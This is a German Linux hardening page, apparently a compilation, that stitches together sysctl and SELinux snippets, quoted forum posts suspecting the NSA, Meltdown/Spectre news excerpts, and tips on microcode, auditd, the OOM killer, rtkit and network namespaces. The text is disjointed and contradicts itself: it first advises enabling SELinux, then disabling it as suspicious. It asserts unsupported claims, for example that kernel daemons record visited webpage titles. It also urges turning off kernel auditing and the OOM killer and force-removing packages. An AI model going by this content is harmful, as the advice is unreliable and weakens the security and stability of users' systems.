134217728 nano /etc/sysctl.d/libvirtd The kernel allocates aio memory on demand, and this number limits the # number of parallel aio requests; the only drawback of a larger limit is # that a malicious guest could issue parallel requests to cause the kernel # to set aside memory. Set this number at least as large as # 128 * (number of virtual disks on the host) # Libvirt uses a default of 1M requests to allow 8k disks, with at most # 64M of kernel memory if all disks hit an aio request at the same time. # fs.aio-max-nr = 1048576 Start ktune sh /etc/init.d/ktune start Aktiviere SELinux Security-Enhanced Linux (SELinux) ist ein zugriffskontrollenbasierter Sicherheitheitsmechanismus des Kernels. SELinux stellt drei Basis-Modi bereit. Enforcing: Dieser Modus erzwingt die Sicherheitsregeln. Permissive: In diesem Modus erzwingt SELinux die Regeln noch nicht, es warnt und protokolliert Aktionen lediglich. Dieser Modus kann bei Problemen mit SELinux weiterhelfen. Disabled: SELinux ist abgeschaltet. Der Modus von SELinux mode wird mit den Befehlen ´system-config-selinux´, ´getenforce´ or ´sestatus´ abgefragt. sestatus Falls "disabled", erlaube SELinux mit: setenforce enforcing Alternativ kann SELinux auch mit der Datei ´/etc/selinux/config´ gemanaget werden. Dort kann man es aktivieren und deaktivieren. https://www.tecmint.com/linux-server-hardening-security-tips/. Bootparameter in /boot/grub/menu:lst: "selinux=1" AppArmor oder SELinux?, forum.ubuntuusers.de Warum greift nicht auch Ubuntu zu SELinux, ... So sehe ich das auch....ich habe einfach kein Vertrauen mehr . Tom-L. Beiträge aus dem Jahr 2007 ( fünf Jahre vor Bekanntmachungen Snowdens ): 1181. @glasen Vielen Dank, werds mir morgen mal in Ruhe durchlesen. @timmy11 Soso, die NSA aso. Hmm, da mache ich mir für meinen Teil mal weniger Sorgen... Ich meine, ok, wenns unsere Bundesregierung wäre... Bundestrojaner :lol: Nee, aber mal Quatsch beiseite: Die Sicherheit gegen sog. unbefugte Dritte mag zwar vielleicht tatsächlich höher sein, wenn Institute wie die NSA involviert sind, aber den üblen Beigeschmack empfinde ich auch dabei. timmy11 Vielleicht kann uns ja jemand vom Gegenteil überzeugen. Für mich bedeutet Amerika (also die staatlichen Organisationen) erstmal: Ich will alles wissen und anzapfen. Murdoc Avatar von Murdoc So sehe ich das auch....ich habe einfach kein Vertrauen mehr :( Tom L.: Ich meine mal gelesen zu haben, dass SELinux offizieller Bestandteil des Kernels ist. Insoweit gehe ich davon aus, die sich Kernelentwickler (und zwar mehr als einer) den Quellcode vorab mal ganz genau angesehen haben. glasen: Sorry, aber eure Paranoia ist ja nicht zum Aushalten. Klar hat die NSA an der Entwicklung von SELinux mitgearbeitet, aber da es sich bei Linux um quelloffene und freie Software handelt, es ist unmöglich das die NSA sich irgendwelche Hintertürchen offengehalten hat. Wenn es auch nur eine Zeile Code geben würde, die einem Peer-Review nicht standgehalten hätte, wäre SELinux niemals in die Kernelquellen aufgenommen worden! Murdoc: Das glaube ich ja, aber dennoch haben sie sich alles sehr genau angesehen, und es gibt auch Kernel Exploits :-/ Wenn es der GEHEIMDIENST wirklich drauf anlegen würde, Backdoors in den Kernel zu bringen ... dann bestimmt nicht über ein Projekt wie SELinux, in dem sie sich offiziell einbringen, und den Leute mit gesunder Paranoia und Ahnung von der Materie (also nicht solche wie Du, Murdoc ;)) sehr genau anschauen, sondern über irgendwelche andere Kernelbestandteile. comm_a_nder: Man Jungs, schnallt Eure Aluhüte nicht so eng, dann klappt es auch mit dem Denken. Mosurft: Generell fühl ich mich bei der Verbindung SeLinux - NSA auch nicht so wohl, vor allem weil - so glaube ich - niemand jedes bisschen Quellcode analysieren und durchchecken kann, irgendjemand übersieht immer etwas, sonst gäbe es ja keine Sicherheitslücken, und gerade ein Geheimdienst hat natürlich ein großes Interesse daran, auf "Knopfdruck" alle PCs abchecken zu können... Ich würde mal interessieren, wer SELinux auf seinem Ubunturechner laufen hat und wie es funktioniert! Und wenn jemandem SELinux nicht passt, was ist eigentlich mit Grsecurity? Hat das mal jemand ausprobiert? Grüße Mo comm_a_nder: Falls ich mich im Ton vergriffen haben sollte und Du Dich zu sehr persönlich angegriffen fühlst, tut es mir leid. Zum Thema: Gerade die Teile der Software, die von der NSA dazugekommen ist, werden mir Sicherheit sehr genau analysiert wurden sein. Aber wie ich bereits sagte, gäbe es für die Jungs aus "Crypto City" mit Sicherheit wesentlich effizientere Wege, Code unauffällig in den Kernelsource wandern zu lassen. Murdoc. Wenn wir schon paranoid unterwegs sind, dann stelle ich mal die Frage nach dem BIOS. Jetzt, wo ASUS schon ein Minimal Linux zum Browsen anbietet, stellt sich die Frage, was das BIOS sonst noch so alles kann? Mosurft: Wenn ich schon dem BIOS nicht traue, dann nutze ich besser gar keinen Computer...! ;) ... forum.ubuntuusers.de/topic/apparmor-oder-selinux Gooken.de: Wie, auch nicht dem Bios Marke AWARD? Auf dem ITX-220 befindet sich ein aktivier- wie deaktivierbarer LAN-Chip und ein kleiner weiterer namens Coretemp, (angeblich) für die Temperatur-Regulierung. Diese belassen wir vorsichtshalber deaktivert. Der nächste Punkt: SELinux. Dieses ist wie unser Exkurs noch zeigen wird verdächtig überflü,ssig und gehört daher unserer Meinung nach als Bootparameter streng deaktivert. Naja, lesen Sie zu dieser Thematik auch Mal unseren Teil News&Links. Alle Intel-CPU-Generationen seit Celeron "Wir können alles mitlesen", tagesschau.de, 04.01.2017 An der Aufdeckung der jüngst bekannt gewordenen Schwachstellen in zahlreichen Computerchips waren einem Zeitungsbericht zufolge auch Forscher der Technischen Universität Graz in Österreich beteiligt. "Wir waren selbst schockiert, dass das funktioniert", sagte Michael Schwarz von der TU Graz dem "Tagesspiegel". Durch die Schwachstelle könnten alle Daten ausgelesen werden, die gerade im Computer verbreitet werden. "Wir können im Prinzip alles mitlesen, was sie gerade eintippen." Angreifer könnten so auch an Daten vom Onlinebanking oder gespeicherte Passwörter kommen. "Dazu müssen sie allerdings erst auf ihren Computer gelangen", schränkte Schwarz ein. Wer die normalen Sicherheitshinweise befolge und keine unbekannten Anhänge öffne oder auf dubiose Links klicke, für den bestehe keine unmittelbare Gefahr. https://www.tagesschau.de/ausland/intel-sicherheitsluecke-103.html Schwere Lücke in allen Intel-CPUs entdeckt, PC-WELT, 03.01.2018 Eine schwere Sicherheitslücke steckt in Intel-Prozessoren der letzten 10 Jahre (die von uns vorgestellte ist nicht dabei, Anm., Gooken). Die Schließung kostet Performance. https://www.pcwelt.de/a/schwere-luecke-in-allen-intel-cpus-entdeckt,3449263 Wie funktioniert diese Sicherheitslücke überhaupt? Das Problem steckt im Prozessor der Geräte, genauer gesagt in einer bestimmten Funktion. Um die Prozessoren möglichst gut auszulasten, übernehmen sie in ruhigeren Zeiten Aufgaben, die möglicherweise erst später gebraucht werden. In dieser Technik haben Sicherheitsforscher eine Lücke entdeckt, die es möglich macht, auf alle Daten der Geräte zuzugreifen - auch auf persönliche Daten wie Passwörter. Bin ich auch betroffen? Fragt man Sicherheitsforscher, ist die Antwort klar: "Höchstwahrscheinlich ja". Das liegt zum einen daran, dass diese Sicherheitslücke sich in einer Technik befindet, die seit über 20 Jahren in viele Prozessoren eingebaut wird. Zum anderen hängt es damit zusammen, dass wir immer mehr Geräte nutzen, in denen Prozessoren eingesetzt werden. Von der aktuellen Lücke können vor allem klassische PCs und Notebooks, Smartphones und Tablets betroffen sein. Wie funktioniert diese Sicherheitslücke überhaupt? Das Problem steckt im Prozessor der Geräte, genauer gesagt in einer bestimmten Funktion. Um die Prozessoren möglichst gut auszulasten, übernehmen sie in ruhigeren Zeiten Aufgaben, die möglicherweise erst später gebraucht werden. In dieser Technik haben Sicherheitsforscher eine Lücke entdeckt, die es möglich macht, auf alle Daten der Geräte zuzugreifen - auch auf persönliche Daten wie Passwörter. Welche Prozessoren haben das Problem? Der Prozessorhersteller Intel hat das Problem für einen Großteil seiner Prozessoren eingeräumt. Daneben gibt es zwei weitere, große Prozessorhersteller: AMD und ARM. Bei AMD-Prozessoren ist die Lage noch unübersichtlich; das Unternehmen selbst hat am Mittwoch dementiert, dass es von den Problemen betroffen ist, Sicherheitsforscher dagegen haben auch AMD-Prozessoren auf ihrer Liste. ARM-Prozessoren, die vor allem in Smartphones und anderen mobilen Geräten eingesetzt werden, sind teilweise betroffen. Der Hersteller hat eine entsprechende übersicht ins Netz gestellt. Ist mein Smartphone auch betroffen? Das lässt sich noch nicht zuverlässig sagen - die Wahrscheinlichkeit ist aber hoch. In Smartphones werden bevorzugt ARM-Prozessoren eingesetzt, von denen viele Modelle anfällig für die Sicherheitslücke sind. Gerade für Android-Smartphones könnte das ein großes Problem sein, denn viele ältere Geräte werden von den Herstellern nicht mehr mit Updates versorgt, die Sicherheitslücke wird also bestehen bleiben. Wie lässt sich das Problem beseitigen? Per Software-Update lässt sich die Lücke nur zum Teil beseitigen. Die Sicherheitsforscher sehen zwei verschiedene Sicherheits-Szenarien für einen Angriff: "Meltdown" und "Spectre". Das "Meltdown"-Problem lässt sich per Software-Update lösen, die "Spectre"-Sicherheitslücke dagegen nicht direkt. Dort kann ein Update erst dann helfen, wenn entsprechende Schadprogramme, die diese Lücke nutzen, im PC erkannt wurden. Was sind "Meltdown" und "Spectre"? Gibt es schon Updates? Ja, Microsoft hat bereits ein Not-Update für Windows 10 bereitgestellt, dieses trägt die Kennummer KB4056890 und kann über die Update-Funktion des Betriebssystems installiert werden. Auch für Apple-Computern gibt es schon ein Update; die Lücke wurde Anfang September mit der Aktualisierung auf die Version 10.13.2 geschlossen. Wer alle aktuellen Updates eingespielt hat, ist damit erst einmal sicher vor Angriffen. ähnlich sieht es bei Linux aus, auch hier gibt es erste Updates, die das System sicher machen sollen. Werden PCs durch das Update langsamer? Wahrscheinlich ja: Sicherheitsforscher sind in einer ersten Schätzung davon ausgegangen, dass ein Update PCs um bis zu 30 Prozent ausbremsen wird. Der Prozessor-Hersteller Intel widerspricht und geht von maximal zwei Prozent Geschwindigkeitsverlust aus. Wie sich die Updates in der Praxis bemerkbar machen, muss sich erst noch zeigen - Forscher gehen aber davon aus, dass die Updates im Laufe der Zeit besser werden und PCs kaum noch ausbremsen werden. Muss ich Angst um meine persönlichen Daten haben? Jein. Die Sicherheitslücke ist massiv und bietet Hackern bisher ungeahnte Möglichkeiten. Die Profis werden sich aber vor allem auf Rechenzentren mit Cloud-Daten stürzen. Die sind auch von der Sicherheitslücke betroffen. Dort werden teilweise Daten von Millionen Nutzern gespeichert, was sie als Angriffsziele viel interessanter macht als die PCs einzelner Nutzer. https://www.tagesschau.de/ausland/prozessoren-101.html ... mögliche Abhilfen: Datenbatt: von uns empfohlene Plattform: ITX-220: keine tabellarische Auflistung von derartigem Exploit bedrohter dem Mainboard zugehöriger spezieller Celeron-CPU durch Intel (1) und kein Auffinden den Exploit nach zugehörigem Intel-Werkzeug zur Systemanalyse (intel-sa00086.zip für Linux) kausalisierendens Modul MEI (2) (dieses lässt sich über das Kommando "modprobe mei" jedoch manuell, selbsttätig über /etc/modules oder bereits in dracut einbinden). Is there a workaround/fix? - There are patches against Meltdown for Linux ( KPTI (formerly KAISER)), Windows, and OS X. There is also work to harden software against future exploitation of Spectre, respectively to patch software after exploitation through Spectre, .https://meltdownattack.com/ - iucode-tool (pclos2018) - CPU: mausklick-schnell und sicher: microcode_ctl (el6: microcode_ctl-1.17-33.23.el6_10.x86_64.rpm, fc29: 2.1-34, rosa2016.1 über el6) ggfls. entpacken und in Verzeichnisse kopieren) oder (derzeit noch mausklick-schneller) ucode-intel (OpenSuSE, gt;= 20190618-lp151.2.3.1.x86_64.rpm, ucode-intel-20190618-lp150.2.24.1.x86_64, ucode-intel-20190618-lp150.2.24.1.x86_64.rpm20190312-lp151.1.1, rpm), damit er als Befehl oder von der Konsole aus aktiviert wird, installiere zunächst microcode_ctl (el6, rpm -i --force), dann entpacktes microde_ctl (microcode_ctl-1.17-33.23.el6_10.x86_64.rpm, rosa2016.1). In jedem Fall sollte ein aktuelles und das schnellste microcode_ctl installiert werden. Das Flashen der CPU mit dem Microcode muss noch über den Befehl "microcode_ctl -Qu" mit jedem Bootvorgang (z.B. von /etc/rc.local oder aus /usr/share/autostart/ heraus) erfolgen, andernfalls läuft die CPU wieder mit dem Werkscode vor dem Flashen. Changelog rpm microcode_ctl * Fr Dez 15 2017 Petr Oros poros@redhat.com - 1:1.17-25.2 - Update Intel CPU microde for 06-3f-02, 06-4f-01 and 06-55-04 - Add amd microcode_amd_fam17h.bin data file - Resolves: #1527357 Firmware: Für Mausklick-Schnelle sorgt neben microcode_ctl (rosa2016.1, el6) erst aktuelle kernel-firmware (el6, aus dem Jahr 2020) mit kernel-headers (el6). Deaktivierung des Kernel-Moduls MEI (Eintrag "blacklist mei" in /etc/modprobe.d/001blacklist). Security-Checks von Intel ü,berprüfen insbesonders dessen Aktivierung als auf Grundlage des Datenblatts alleinige Gefahrenquelle. Firewall Linfw3: Zur generellen Verhinderung von Auslesen durch Treiber, hier über Spectre und Meltdown: Zulassung des Netzverkehrs nur für den einzig zuzulassenden Benutzer namens "surfuser" mit Surf-Gruppe "surfgruppe" mit Zuweisung der Gruppe wie z.B. "nobody" zu dessen Primärgruppe! Linfw3 lässt also nur Benutzer "surfuser" mit dessen Gruppe "surfgruppe" (anstatt dessen Primärgruppe "nobody") fürs Online zu. Dabei wird mit Linfw3 selbst root (UID: root bzw. 0, GID: root bzw. 0) gesperrt. Um paranoid zu sichern, damit die Verwirrung für den Kernel und CPU perfekt wird, alle Gruppennamen an Verzeichnissen und Dateien von surfuser (Benutzer mit Primärgruppe "nobody") noch auf "nobody" (anstelle surfgroup) setzen! CPU: Sicher vor Meltdown, Spectre und Co?, PC-WELT.de, 28.05.2019 Die CPU-Sicherheitslücken Meltdown und Spectre halten die Linux-Kernel-Entwickler weiterhin auf Trab, zumal es je nach Prozessortyp 15 dokumentierte Varianten gibt. Schützt das aktuell genutzte Linux gegen bekannte Lücken? Wenn ja, gegen welche? Ein Blick auf die CPU-Flags gibt darüber Aufschluss. Was können Meltdown und Spectre in Linux anrichten? Es ist Sache der Kernel-Entwickler, Patches gegen die Spectre- und Meltdown-Lücken aufzunehmen. Danach folgt die Aufgabe für die Distributionsmaintainer, gepatchte Kernel-Versionen zeitnah per Update auszuliefern. Am Ende steht die Verantwortung von Anwendern beziehungsweise Admins, die Aktualisierungen dann auch wirklich einzuspielen. Von Seiten der Kernel-Entwickler gibt es mittlerweile immerhin eine einfache Methode, den Linux-Kernel nach erkannten und entschärfte CPU-Lücken abzufragen: Der Befehl head /sys/devices/system/cpu/vulnerabilities/* listet die erkannten Bugs in der verbauten CPU auf und gibt mit jeweils mit dem Stichwort "Mitigation" an, ob diese Lücken durch den Kernel gepatcht sind. Falls nicht, prangt hier ein "Vulnerable" (Verwundbar) hinter dem Namen des Bugs. Achtung: Falls es die abgefragten Einträge überhaupt nicht gibt und head eine Fehlermeldung ausgibt, so ist der laufende Kernel definitiv zu alt und die Distribution verlangt dringend nach einem Update. Die nicht betroffenen ARM-CPUs antworten auf die Abfrage ebenfalls nicht. https://www.pcwelt.de/tipps/CPU-Sicher-vor-Meltdown-Spectre-und-Co-10593390.html Nach der Installation des kernel-4.19 (pclos) gehe noch seinen Anforderungen nach und installiere davon noch nicht erfüllte wie kmod (pclos): "rpm -qi --requires kernel-4.19....". - Intel: Werkzeug für ME-Sicherheitslücken vorgestellt, 24.11.2017, https://www.pro-linux.de/news/1/25369/ intel-werkzeug-f%C3%BCr-me-sicherheitsl%C3%BCcken-vorgestellt.html - kernel-4.14 mit von kernel-4.15 reintegriertem KPTI-/KAISER-Patch - "modprobe mei" oder besser: Ein- besser: Austrag von Kernel-Modul "mei" in /etc/modules . - Update Firefox auf Version 63 bzw. 52.9.0-ESR (slack, OpenSuSE) - mit aus aktuellem Firefox aktualisierter nss (libnss*.so, libnspr4.so, libssl3.so) und "Security fixes to address the Meltdown and Spectre timing attacks - https://blog.mozilla.org/security/2018/01/03/mitigations-landing-new-class-timing-attack/ - Require new nss 3.34 (fixed rhbz#1531031) - Disabled ARM on all Fedoras due to rhbz#1523912" - Nvidia vs. Spectre: Neue Nvidia-Treiber schützen vor Spectre-CPU-Attacken, https://www.pcwelt.de/a/neue-nvidia-treiber-schuetzen-vor-spectre-cpu-attacken,3449339 NVIDIA graphics drivers (USN-3521-1, https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/SpectreAndMeltdown? _ga=2.1814 40484.214514 9635.1515760095 -1741249263.1499327986) - Webkitgtk+ (USN-3530-1) - QEMU (USN-3560-1) - libvirt (USN-3561-1) - Cloud Images: Cloud images which address CVE-2017-5753 and CVE-2017-5715 (aka Spectre) and CVE-2017-5754 (aka Meltdown) are available for https://cloud-images.ubuntu.com from for the following releases: ... Sensoren und Chips des Mainboards einbinden: Paket lm_sensors (pclos) sensors-detect modprobe für gefundene Module oder besser: Eintrag in /etc/modules (ITX-220: it87, coretemp, i2c-dev, mei, empfohlen: inaktiviert) hingegen ggfls sicherer und mausklick-schneller. Einkommentierung oder ohne Eintrag in /etc/modules LAN-Chip: ggfls. im BIOS mit CMOS-BIOS-Setup aktivieren (Grundeinstellung, empfohlen: inaktiviert) quot;The Big Brother is watching you!" Benutzerüberwachung und - Aktivitätenverfolgung, 4.11.10, https://www.debian.org/doc/manuals/securing-debian-howto/ch4.de.html Wenn Sie wirklich paranoid sind, sollten Sie eine systemweite Einrichtung verwenden, um zu überwachen, was die Benutzer auf Ihrem System tun. In diesem Abschnitt werden einige Tipps vorgestellt, wie Sie verschiedene Werkzeuge verwenden. Überwachung von Ein- und Ausgabe mittels eines Skripts, 4.11.10.1 - die Chronikdatei der Shell benutzen, 4.11.10.2 - Vervollständigung der Benutzerüberwachung durch Accounting-Werkzeuge, 4.11.10.3 - andere Methoden zur Benutzerüberwachung, 4.11.10.4 - Nachprüfung der Benutzerprofile, 4.11.11 - Umasks der Benutzer einstellen, 4.11.12 Abhängig von Ihren Benutzerrichtlinien möchten Sie ändern, wie Benutzer Informationen gemeinsam benutzen können. Dabei geht es um die Standardrechte von neu erstellten Dateien. - Begrenzung des Zugangs zu Informationen anderer Benutzer, 4.11.13.1 - Nutzung und Anpassung von logcheck, 4.13.1 Verfolgung der Benutzeraktivitäten If you are dealing with lots of users, then its important to collect the information of each user activities and processes consumed by them and analyse them at a later time or in case if any kind of performance, security issues. But how we can monitor and collect user activities information. There are two useful tools called ´psacct´ and ´acct´ are used for monitoring user activities and processes on a system. These tools runs in a system background and continuously tracks each user activity on a system and resources consumed by services such as Apache, MySQL, SSH, FTP, etc. For more information about installation, configuration and usage, visit the below url. Monitor User Activity with psacct or acct commands. https://www.tecmint.com/linux-server-hardening-security-tips/ System-Buchhaltung mit auditd auditd ermöglicht System-Audit. During startup, the rules in /etc/audit.rules are read by this daemon. You can open /etc/audit.rules file and make changes such as setup audit file log location and other option. With auditd you can answers the following questions: System startup and shutdown events (reboot / halt). Date and time of the event. User responsible for the event (such as trying to access /path/to/topuser.dat file). Type of event (edit, access, delete, write, update file &commands). Success or failure of the event. Records events that modify date and time. Find out who made changes to modify the system´s network settings. Record events that modify user/group information. See who made changes to a file etc. See our quick tutorial which explains enabling and using the auditd service. https://www.cyberciti.biz/tips/linux-security.html kauditd und auditd: Linux-Kernel-Audit-Subsystem und Linux-Audit-System Who does audit the audit code? "00:00:12 [kauditd] dbadmin 4182 1 4182 0 1 May18 00:02:19 /opt/vertica/spread/sbin/spread -c /home/dbadmin/DatabaseName/v_DatabaseName_node0001_catalog/spread.conf..." https://forum.vertica.com/discussion/236239/vertica-service-not-starting-after-server-reboot Kernel-interner audit-Daemon kauditd: URL, Webseiten-Inhalte: Fentstertitel, ... (online mit Browsern wie Firefox) kauditd is a kernel process, which is a part of the Linux kernel responsible for the kernel audit events (and communicates with the auditd process). The special brackets surrounding it are telling you that this is not a regular (userland) process (launched through a command), but a kernel process (started/managed by the Linux kernel itself) https://wiki.gentoo.org/wiki/SELinux/Tutorials/The_security_context_of_a_process How to use Auditing System in Linux - Configure, Audit Logs and ... Well, the Linux Auditing system is the answer for all the above questions. The Linux Auditing system allows an administrator to configure audit rules to monitor the system calls, network access, files etc…and generate a summary report - which can be later analyzed and investigated for suspicious activity. https://techglimpse.com/how-to-use-auditing-system-in-linux-configure-audit-logs-and-generate-reports/ See our quick tutorial which explains enabling and using the auditd service. https://www.cyberciti.biz/tips/linux-security.html The Linux audit subsystem is not one of the best-loved parts of the kernel. It allows the creation of a log stream documenting specific system events - system calls, modifications to specific files, actions by processes with certain user IDs, etc. For some, it is an ideal way to get a handle on what is being done on the system and, in particular, to satisfy various requirements for security certifications (Common Criteria, for example). For others, it is an ugly and invasive addition to the kernel that adds maintenance and runtime overhead without adding useful functionality. More recently, though, it seems that audit adds some security holes of its own. But the real problem, perhaps, is that almost nobody actually looks at this code, so bugs can lurk for a long time. The system call auditing mechanism creates audit log entries in response to system calls; the system administrator can load rules specifying which system calls are to be logged. These rules can include various tests on system call parameters, but there is also a simple bitmask, indexed by system call number, specifying which calls might be of interest. One of the first things done by the audit code is to check the appropriate bit for the current system call to see if it is set; if it is not, there is no auditing work to be done. [...] In summary, the code is a giant mess. The way it works is nearly incomprehensible. It contains at least one severe bug. I´d love to see it fixed, but for now, distributions seem to think that enabling CONFIG_AUDITSYSCALL is a reasonable thing to do, and I´d argue that it´s actually a terrible choice for anyone who doesn´t actually need syscall audit rules. And I don´t know who needs these things. It is telling, though, that this particular vulnerability has existed in the audit subsystem almost since its inception. The audit code receives little in the way of review; most kernel developers simply turn it off for their own kernels and look the other way. But this subsystem is just the sort of thing that distributors are almost required to enable in their kernels; some users will want it, so they have to turn it on for everybody. As a result, almost all systems out there have audit enabled (look for a running kauditd thread), even though few of them are using it. These systems take a performance penalty just for having audit enabled, and they are vulnerable to any issues that may be found in the audit code. If audit were to be implemented today, the developer involved would have to give some serious thought, at least, to using the tracing mechanism. It already has hooks applied in all of the right places, but those hooks have (almost) zero overhead when they are not enabled. Tracing has its own filtering mechanism built in; the addition of BPF-based filters will make that feature more capable and faster as well. In a sense, the audit subsystem contains yet another kernel-based virtual machine that makes decisions about which events to log; using the tracing infrastructure would allow the removal of that code and a consolidation to a single virtual machine that is more widely maintained and reviewed. The audit system we have, though, predates the tracing subsystem, so it could not have been based on tracing. Replacing it without breaking users would not be a trivial job, even in the absence of snags that have been glossed over in the above paragraph (and such snags certainly exist). So we are likely stuck with the current audit subsystem (which will certainly not be marked "broken" in the mainline kernel) for the foreseeable future. Hopefully it will receive some auditing of its own just in case there are more old surprises lurking therein. Posted May 30, 2014 6:50 UTC (Fri) by bnorris (subscriber, #92090) [Link] > As a result, almost all systems out there have audit enabled $ grep CONFIG_AUDIT /boot/config-´uname -r´ CONFIG_AUDIT_ARCH=y CONFIG_AUDIT=y CONFIG_AUDITSYSCALL=y CONFIG_AUDIT_WATCH=y CONFIG_AUDIT_TREE=y ( Sie möchten diese Zeilen ggfls. einkommentieren ...? ) > (look for a running kauditd thread) None here. > even though few of them are using it. These systems take a performance penalty just for having audit enabled, and they are vulnerable to any issues that may be found in the audit code. I´m not an expert on the kaudit subsystem (in fact, I just learned of it), but it looks like kauditd is only spawned in response to a user-space request for it (e.g. from SELinux auditd). See kernel/audit.c:... https://lwn.net/Articles/600568/ man auditd man auditd.conf Disable auditd temporarily (this will disable logging instantly but will not survive a reboot): auditctl -e0 # z.B. in /etc/rc.local Disable auditd permanently (this will require a reboot): systemctl disable auditd http://kb.ictbanking.net/article.php?id=632 kauditd - CentOS | Forum kauditd. General support questions including new installations. How to disable kauditd? I tried to put audit=0 to the kernel line in grub, but no luck.... www.centos.org/forums/viewtopic.php?t=10899 Warum hatte er nur kein Glück damit? Bootparameter "audit=0" (Grub: /boot/grub/menu.lst) verhindert sehr wohl jeglichen Start des (auch mit SELinux von NSA möglicherweise in Verbindung stehenden) Kernel-Audit-Dämons kauditd: kein Kernel-Audit von Prozessen wie Firefox mehr! Disable the OOM Killer (process oom_reaper), The Ubuntu Forum Community, Ubuntu Specialised Support, January 2nd, 2014 As the title suggests, regardless of the repercussions, how do you disable this "feature". Please do not provide alternate suggestions such as "get more ram" or "tell the program to use less memory". I´m running a Minecraft server that has its heap space and permgen configured to use nearly all of the available memory on the vps where it resides. I have a highly specific reason for doing this and no, it has never caused me any problems in the past. Yes the OOM Killer is killing the process see: OOM killed process 659 (java) vm:4973220kB, rss:2066504kB, swap:0kB Who ever thought killing processes that are consuming beyond a specific amount of memory was a good idea, you have caused me and, the users of my server immeasurable levels of frustration. I am no Linux guru, so any help would be appreciated so long as that help reads "To disable the oom-killer do X". Thank you in advance. Re: Disable the OOM Killer http://thetechnick.blogspot.com/2010...-on-linux.html http://www.oracle.com/technetwork/ar...r-1911807.html The OOM killer can be completely disabled with the following command. This is not recommended for production environments, because if an out-of-memory condition does present itself, there could be unexpected behavior depending on the available system resources and configuration. This unexpected behavior could be anything from a kernel panic to a hang depending on the resources available to the kernel at the time of the OOM condition. sysctl vm.overcommit_memory=2 # mausklick-schnell echo "vm.overcommit_memory=2" >> /etc/sysctl.conf [...] Re: Disable the OOM Killer Hi, Psionic, I was having the same difficulties. You report that the oom-killer is still killing your process, I suggest either properly fully disabling the oom-killer or lowering the overcommit ratio, as follows: Disabling OOM Killer According to: https://www.kernel.org/doc/Documenta...ups/memory.txt Code: You can disable the OOM-killer by writing "1" to memory.oom_control file, as: # echo 1 > memory.oom_control # (unknown variable by sysctl, remark, Gooken) Reducing Overcommit Ratio According to https://www.kernel.org/doc/Documenta...mit-accounting Code: 2 - Don´t overcommit. The total address space commit for the system is not permitted to exceed swap + a configurable amount (default is 50%) of physical RAM. Depending on the amount you use, in most situations this means a process will not be killed while accessing pages but will receive errors on memory allocation as appropriate. Useful for applications that want to guarantee their memory allocations will be available in the future without having to initialize every page. The overcommit policy is set via the sysctl ´vm.overcommit_memory´. The overcommit amount can be set via ´vm.overcommit_ratio´ (percentage) or ´vm.overcommit_kbytes´ (absolute value). There´s a rather good article on this topic http://www.linuxdevcenter.com/pub/a/...ry.html?page=1 Of course, in general if you´re getting processes killed it means there´s a problem with using more memory than the system can cope with, and the symptoms are very likely to come out somewhere else. In my case the oom-killer was definitely picking the right process, even though it was the primary purpose of the whole computer: the program had a data-dependent bug and was allocating memory out of control. I hope that helps. Kind regards, ... https://serverfault.com/questions/606185/how-does-vm-overcommit-memory-work More about oom_reaper (oom_kill) https://stackoverflow.com/questions/35791416/how-to-disable-the-oom-killer-in-linux https://lwn.net/Articles/666024/ https://lwn.net/Articles/668126/ https://code.woboq.org/linux/linux/mm/oom_kill.c.html https://www.oracle.com/technical-resources/articles/it-infrastructure/dev-oom-killer.html https://superuser.com/q/1150215 https://ubuntuforums.org/showthread.php?t=2197016 https://askubuntu.com/q/1188024 https://unix.stackexchange.com/q/432171 https://blog.csdn.net/s_lisheng/article/details/82192613 Deaktivierung des rtkit-daemon (rpm rtkit) Description: "RealtimeKit is a D-Bus system service that changes the scheduling policy of user processes/threads to SCHED_RR (i.e. realtime scheduling mode) on request. It is intended to be used as a secure mechanism to allow real-time scheduling to be used by normal user processes.". https://fr2.rpmfind.net/ "I´s...a management daemon so to say. Instead of applications asking the kernel directly (and needing proper permissions for this, usually root) they ask the daemon. The daemon can hand out the realtime permissions then according it its configuration (/etc/dbus-1/system.d/org.freedesktop.RealtimeKit1.conf). It´s simply a helper process that allows applications to ask for realtime permissions through dbus...not really much more. But having such a helper process makes the whole procedure much more secure (no suid root needed for some programs), cleaner (dbus interface) and more flexible (one daemon to configure, not each program with an own configuration..if at all)." For rtkit isn´t almost needed, as we got told in the internet above, and there are no real dependencies from it, it´ might not be a bad idea to deinstall it: "rpm -e --nodeps rtkit" ... dasselbe ggfls. mit Packagekit (el6), gvfsd (rpm: gvfs (el6) usw.: einfach deinstallieren! Je weniger (nicht benötigte) Daemonen (rpm) unter root laufen, desto mausklick-schneller und sicherer das System! Deaktivierung von netns, migration/0, oom_reaper, kintegrityd,... ( einer von ihnen listet sogar den Titel der aktuell aufgerufenen Webseite auf !) Kernel-Daemons lassen sich i.a. nicht deaktivieren! Ihre Deaktivierung gelingt ggfls nur ü,ber die Deaktivierung einzelner, nicht benötigter Kernel-Module mittels rmmod und delmod oder Kernel-Neukonfiguration (in .config). netns Running strongSwan in Network Namespaces (netns) on Linux Normally, the network stack (interfaces, routing tables, firewall rules etc.) is shared by all processes running on an operating system. With Linux network namespaces (netns) it´s possible to have multiple separate instances of the network stack. Note: While basic support for network namespaces was added to the Linux kernel a long time ago, some features (e.g. CLUSTERIP support) might require a recent kernel. The easiest way to work with network namespaces is to use the ip command of the iproute2 package. These commands will have to be executed as root (i.e. with sudo on most distros). Network Namespace Basics To create a new netns use the following command: # ip netns add <network namespace name> A list of all currently defined netns is provided by ip netns list. Interfaces can be assigned to a netns with the ip link command: # ip link set <interface name netns <netns name> If you run ip link list afterwards such an interface won´t be seen as it is only available in the configured netns. So to actually list the interface in a specific netns it´s required to be able to run commands in a specific netns. This can be done with the ip netns exec command. So to get a list of interfaces defined in a specific netns use: # ip netns exec <netns name> ip link list If only one physical interface is available, or if you don´t want to assign physical interfaces to the netns for other reasons, it´s possible to create virtual Ethernet interface pairs (veth, provided via CONFIG_VETH). These are like a bi-directional pipe (i.e. what´s written to one end comes out the other and vice-versa) of which one end is placed inside the netns and the other stays outside in the "default" or "global" namespace. To create such a pair use: # ip link add <interface name 1> type veth peer name <interface name 2> This creates two connected Enthernet interfaces with the given names. One is assigned to a netns (via ip link) the other is not (it doesn´t matter which one and it´s also possible to assign both interfaces to two different netns to connect them). How the outer interface is used depends on the use case, it may be put inside a bridge, or used in routing rules to route traffic to and from a netns. Since interfaces assigned to a netns are disabled they have to be enabled first, and they will probably also require an IP address, which can be done with: # ip netns exec <netns name> ip addr add x.x.x.x/x dev <iface name> # ip netns exec <netns name> ip link set dev <iface name> up Similar to 